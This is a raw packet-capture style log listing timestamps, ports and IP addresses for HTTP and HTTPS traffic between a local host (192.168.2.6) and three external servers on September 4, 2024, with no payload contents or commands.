Sep 4, 2024 17:37:07.075822115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075830936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075845957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075855970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075865984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075866938 CEST	49720	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:07.075871944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075879097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075889111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075896978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075901031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075901985 CEST	49720	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:07.075912952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075923920 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075927019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075939894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075941086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075952053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075963020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075965881 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075973988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075984955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.075990915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.075999975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076004982 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076011896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076028109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076056004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076316118 CEST	49726	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:07.076638937 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.076661110 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.076724052 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.076730013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076741934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076750994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076761961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076773882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076775074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076787949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076788902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076800108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076811075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076818943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076822042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076834917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076838017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076845884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076847076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076858044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076869965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076877117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076880932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076894045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076903105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076904058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076915979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076920986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076929092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.076942921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.076970100 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077207088 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:07.077219963 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:07.077675104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077687979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077697039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077708006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077714920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077723980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077735901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077743053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077748060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077759981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077768087 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077775002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077776909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077778101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077790022 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077794075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077802896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077812910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077815056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077826023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077826977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077838898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077850103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077852011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077867031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077877045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.077882051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077883005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077896118 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.077920914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.078475952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.078525066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079468966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079483032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079494953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079526901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079539061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079562902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079574108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079583883 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079600096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079606056 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079626083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079647064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079754114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079763889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079777002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079788923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079792976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079802990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079813957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079834938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.079835892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.079875946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080600977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080651045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080682039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080702066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080713034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080722094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080724955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080734015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080741882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080750942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080754042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080780029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080801010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.080816031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.080852985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.081229925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081274986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.081305981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081319094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081345081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.081464052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081476927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081487894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081500053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081506968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.081525087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.081593990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.081630945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082143068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082185030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082334995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082345963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082356930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082372904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082381010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082385063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082396984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082402945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082425117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082443953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.082504988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.082541943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083106995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083151102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083165884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083179951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083203077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083214045 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083276987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083288908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083298922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083308935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083322048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083345890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083408117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083451033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083663940 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083707094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083709955 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083724022 CEST	80	49720	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:07.083761930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083795071 CEST	80	49726	154.216.17.178	192.168.2.6
Sep 4, 2024 17:37:07.083805084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083815098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083826065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.083842039 CEST	49726	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:07.083858967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.083996058 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084007025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084018946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084028959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084033012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084057093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084086895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084120035 CEST	49726	80	192.168.2.6	154.216.17.178
Sep 4, 2024 17:37:07.084264040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084279060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084292889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084311962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084316969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084328890 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084336996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084337950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084352016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084361076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084364891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084381104 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084414005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084485054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084503889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084515095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084525108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084551096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084563971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084610939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084649086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084680080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084692001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084701061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.084713936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084726095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.084748983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085000038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085042953 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085067034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085078955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085104942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085197926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085208893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085218906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085232019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085241079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085258961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085282087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085290909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085328102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085376978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085388899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085417986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085431099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085510969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085521936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085530996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085544109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085547924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085556984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085578918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085638046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.085676908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.085984945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086030960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086035967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086051941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086077929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086091042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086127043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086138964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086149931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086164951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086177111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086195946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086308956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086319923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086330891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086353064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086378098 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086452961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086466074 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086476088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086489916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086496115 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086524963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086556911 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086695910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086740017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086833954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086878061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.086920023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086930990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.086963892 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087028980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087042093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087053061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087065935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087074041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087090969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087246895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087259054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087275028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087285995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087296009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087297916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087299109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087308884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087311983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087336063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087358952 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087483883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087496996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087533951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087852001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087862968 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087872982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.087896109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087908030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.087989092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088032961 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088041067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088054895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088077068 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088088989 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088171005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088184118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088193893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088206053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088212967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088224888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088253021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088320971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088332891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088363886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088365078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088396072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088429928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088442087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088471889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088578939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088589907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088602066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088620901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088634014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088766098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088783979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088812113 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088829994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.088932991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.088979006 CEST	49717	80	192.168.2.6	147.45.44.104
